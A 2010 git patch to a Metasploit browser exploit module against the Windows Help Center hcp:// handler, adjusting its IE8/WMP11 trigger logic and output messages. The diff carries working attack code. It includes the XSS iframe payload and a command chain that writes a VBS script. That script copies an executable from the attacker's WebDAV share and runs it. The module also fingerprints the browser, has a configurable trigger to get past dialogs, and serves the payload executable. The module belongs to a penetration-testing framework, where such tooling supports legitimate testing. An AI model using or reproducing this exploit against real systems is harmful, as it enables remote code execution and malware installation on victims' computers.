From 7cbc566c7b73dc23b8868b4a1cf940eee3609a12 Mon Sep 17 00:00:00 2001
From: natron <>
Date: Fri, 11 Jun 2010 20:54:35 +0000
Subject: [PATCH] Bug fixes for WMP11 and IE8, new configurable setting for
 exploit trigger, and output cleanup.

git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/ms10_xxx_helpctr_xss_cmd_exec.rb  | 100 +++++++++---------
 1 file changed, 49 insertions(+), 51 deletions(-)

diff --git a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
index 9e724908ce..5c5c0f2d7c 100644
--- a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
@@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
-	include Msf::Exploit::CmdStagerVBS
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				directly via URLs by installing a protocol handler for the scheme "hcp". Due to
 				an error in validation of input to hcp:// combined with a local cross site
 				scripting vulnerability and a specialized mechanism to launch the XSS trigger,
-				arbitrary command execution can be achieved.
+				arbitrary command execution can be achieved. 
 
-				On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
-				box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
-				If IE8 and WMP11, a dialog box will ask the user if execution should continue.
-				Automatic detection of these options is implemented in this module, and will
-				default to not sending the exploit for IE8/WMP11 unless the option is overridden.
+				On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it 
+				can be used to launch the exploit automatically. If IE8 and WMP11, either can 
+				be used to launch the attack, but both pop dialog boxes asking the user if 
+				execution should continue. This exploit detects if non-intrusive mechanisms are
+				available and will use one if possible. In the case of both IE8 and WMP11, the
+				exploit defaults to using an iframe on IE8, but is configurable by setting the
+				DIALOGMECH option to "none" or "player".
 			},
 			'Author'		=>
 				[
@@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'		=> 'win',
 			'Targets'		=>
 				[
-					[ 'Automatic',	{ } ], # Only automatic for now.
-					#[ 'IE6/IE7',		{ 'trigger_method' => 'iframe'	} ], # Only tested IE7 / XP SP2,3
-					#[ 'IE8/WMP9',		{ 'trigger_method' => 'asx'		} ], # untested
-					#[ 'IE8/WMP11',		{ 'trigger_method' => 'asx'		} ], # tested, pops dialog box
+					[ 'Automatic',	{ } ]
 				],
 			'DisclosureDate' => 'June 09, 2010',
 			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				#OptString.new(	'CMD',			 [ true, "The URI-encoded command to execute.",	"calc.exe" ]),
-				OptBool.new(	'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
 				OptPort.new(	'SRVPORT',		 [ true, "The daemon port to listen on", 80 ]),
-				OptString.new(	'URIPATH',		 [ true, "The URI to use.", "/" ])
+				OptString.new(	'URIPATH',		 [ true, "The URI to use.", "/" ]),
+				OptString.new(	'DIALOGMECH',	 [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
 			], self.class)
 
 		deregister_options('SSL', 'SSLVersion') # Just for now
@@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def process_get(cli, request)
 
-		#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
-
 		@my_host   = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-
 		webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
-
 		@url_base  = "http://" + @my_host
 
 		if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
-			print_status "GET for payload received."
+			print_status "Sending payload executable to target ..."
 			return if ((p = regenerate_payload(cli)) == nil)
 
 			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
+		if request.uri.match(/\.gif$/)
+			# "world's smallest gif"
+			data  = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
+			data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
+			print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
+			send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
+		end
 
 		# ASX Request Inbound
 		if request.uri.match(/\.asx$/)
 			asx = %Q|<ASX VERSION="3.0">
 <PARAM name="HTMLView" value="URLBASE/STARTHELP"/>
 <ENTRY>
-   <REF href=""/>
+	<REF href="URLBASE/IMGFILE"/>
 </ENTRY>
 </ASX>
 |
-#<REF href="http://www.metasploit.com/images/icbm.jpg"/>
 			asx.gsub!(/URLBASE/, @url_base)
 			asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
-			print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...")
+			asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
+			print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
 			send_response(cli, asx, { 'Content-Type' => 'text/html' })
 			return
 		end
@@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		if request.uri.match(/#{@start_help}/)
 
 			help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
-			#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
-			#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27TASKKILL%27%29%29%3C/script%3E">|
-			# stolen from Rex::Text, modified to return fromCharCode happy numbers
 
 			rand_vbs	= rand_text_alpha(rand(2)+1) + ".vbs"
-			task_cmd	= "taskkill /F /IM helpctr.exe"
 			copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
 			vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false|
 			write_vbs	= %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
@@ -165,11 +161,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			concat_cmds = "#{write_vbs}|#{launch_vbs}"
 
 			eval_block  = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
-			task_kill	= "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
 			eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
 			help_html.gsub!(/COMMANDS/, eval_block)
-			#help_html.gsub!(/TASKKILL/, task_kill)
-			print_status("Responding to request for exploit iframe at #{cli.peerhost}:#{cli.peerport}...")
+			print_status("Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...")
 			send_response(cli, help_html, { 'Content-Type' => 'text/html' })
 			return
 		end
@@ -196,33 +190,23 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
 
 	// if ie8, check WMP version
 	if (ver > 7) {
-		//alert("IE8 detected. Checking WMP version.");
 		var o = document.createElement("OBJECT");
 		o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
 		o.setAttribute("uiMode", "invisible");
-		// if wmp9
+		// if wmp9, go ahead and launch
 		if( parseInt(o.versionInfo) < 10 ) {
-			//alert("WMP9 or below detected. Launching exploit.");
 			o.openPlayer(asx);
-			// if > wmp9, but overridden via dialog
+		// if > wmp9, only launch if user requests
 		} else {
-			if( RUNWITHDIALOG ) {
-				//alert(">WMP9 detected but launching anyway.");
-				o.openPlayer(asx)
-			} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
+			DIALOGMECH
 		}
+	// if ie7, use iframe
+	} else {
+		launchiframe(ifr);
 	}
-	// if ie6 or 7, use iframe
 } else {
-	//alert("< IE8 detected. Launching via iframe.")
-	launchiframe(ifr);
-}
-} else {
-	//alert("Non-IE detected. Launching via iframe.");
 	// if other, try iframe
-	var o = document.createElement("IFRAME");
-	o.setAttribute("src", ifr);
-	document.body.appendChild(o);
+	launchiframe(ifr);
 }
 |
 
@@ -232,17 +216,31 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
 </body>
 </html>
 |
+		case datastore['DIALOGMECH']
+		when "player"
+			mech = "o.openPlayer(asx);"
+		when "iframe"
+			mech = "launchiframe(ifr);"
+		when "none"
+			mech = ""
+		else
+			mech = ""
+		end
 
 		html.gsub!(/JAVASCRIPTFU/, js)
+		html.gsub!(/DIALOGMECH/, mech)
 		html.gsub!(/URLBASE/, @url_base)
 		html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file)
 		html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help)
 
-		datastore['RUNWITHDIALOG'] ? override = "true" : override = "false"
-		html.gsub!(/RUNWITHDIALOG/, override)
+		print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...")
+		
+		headers = {
+			'Content-Type'		=> 'text/html',
+			#'X-UA-Compatible'	=> 'IE=7'
+		}
 
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-		send_response(cli, html, { 'Content-Type' => 'text/html' })
+		send_response(cli, html, headers)
 	end
 
 	#
@@ -324,7 +322,6 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
 			print_status("Sending 404 for #{path} ...")
 			send_not_found(cli)
 			return
-
 		end
 
 		# send the response
@@ -339,6 +336,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
 		@asx_file	= rand_text_alpha(rand(2)+1) + ".asx"
 		@start_help	= rand_text_alpha(rand(2)+1) + ".html"
 		@payload	= rand_text_alpha(rand(2)+1) + ".exe"
+		@img_file	= rand_text_alpha(rand(2)+1) + ".gif"
 
 		if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
 			raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'